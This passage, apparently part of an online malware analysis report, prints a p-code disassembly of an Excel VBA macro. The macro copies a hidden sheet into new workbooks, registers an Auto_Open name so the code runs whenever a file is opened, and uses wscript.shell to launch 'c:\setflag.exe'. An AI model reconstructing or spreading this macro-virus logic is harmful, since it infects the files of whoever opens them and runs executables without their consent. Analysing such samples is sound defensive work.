' LitStr 0x000E "(m1)_(m2)_(m3)"
' Eq
' Or
' IfBlock
' Line #78:
' ExitSub
' Line #79:
' EndIfBlock
' Line #80:
' StartForVariable
' Ld _B_var_i
' EndForVariable
' LitDI2 0x0001
' Ld createcabfile
' MemLd MenuBar
' For
' Line #81:
' Ld _B_var_i
' ArgsLd createcabfile 0x0001
' MemLd Name
' LitStr 0x0005 "Book1"
' Eq
' IfBlock
' Line #82:
' Ld _B_var_i
' ArgsLd createcabfile 0x0001
' MemLd _B_var_If
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #83:
' Ld _B_var_i
' ArgsLd createcabfile 0x0001
' ArgsMemCall Close 0x0000
' Line #84:
' GoTo Protect
' Line #85:
' EndIfBlock
' Line #86:
' EndIfBlock
' Line #87:
' StartForVariable
' Next
' Line #88:
' Label Protect
' Line #89:
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld ThisWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemCall Cop 0x0001
' Line #90:
' LitVarSpecial (False)
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemSt Visible
' Line #91:
' LitStr 0x000E "(m1)_(m2)_(m3)"
' LitDI2 0x0001
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' MemSt Name
' Line #92:
' LitDI2 0x0002
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld NewWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemLd _B_var_ff 0x0001
' LitDI2 0x0002
' LitStr 0x000E "(m1)_(m2)_(m3)"
' Ld ThisWorkbook
' ArgsMemLd Add 0x0001
' ArgsMemLd _B_var_ff 0x0001
' ArgsMemCall Cop 0x0001
' Line #93:
' LitStr 0x0009 "Auto_Open"
' ParamNamed Name
' LitStr 0x001B "='(m1)_(m2)_(m3)'!R1C1:R8C1"
' ParamNamed Category
' LitStr 0x000C "User Defined"
' ParamNamed MacroType
' Ld ff
' ParamNamed xlCommand
' Ld NewWorkbook
' MemLd RefersToR1C1
' ArgsMemCall Ad 0x0004
' Line #94:
' Ld NewWorkbook
' ArgsMemCall Lines 0x0000
' Line #95:
' Line #96:
' EndSub
' Line #97:
' FuncDefn (Private Sub fso(ByVal NewWorkbook As ))
' Line #98:
' SetStmt
' LitStr 0x000D "wscript.shell"
' ArgsLd w 0x0001
' Set myfolder
' Line #99:
' LitStr 0x000E "c:\setflag.exe"
' St _B_var_exefile
' Line #100:
' Ld _B_var_exefile
' LitStr 0x0001 " "
' Concat
' LitDI2 0x0022
' ArgsLd _B_var_Chr 0x0001
' Concat
' Ld NewWorkbook
' MemLd exefile
' Concat
' LitDI2 0x0022
' ArgsLd _B_var_Chr 0x0001
' Concat
' LitDI2 0x0000
' LitVarSpecial (True)
' Ld myfolder
' ArgsMemCall FullName 0x0003
' Line #101:
' SetStmt
' LitNothing
' Set myfolder
' Line #102:
' EndSub
' Line #103:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.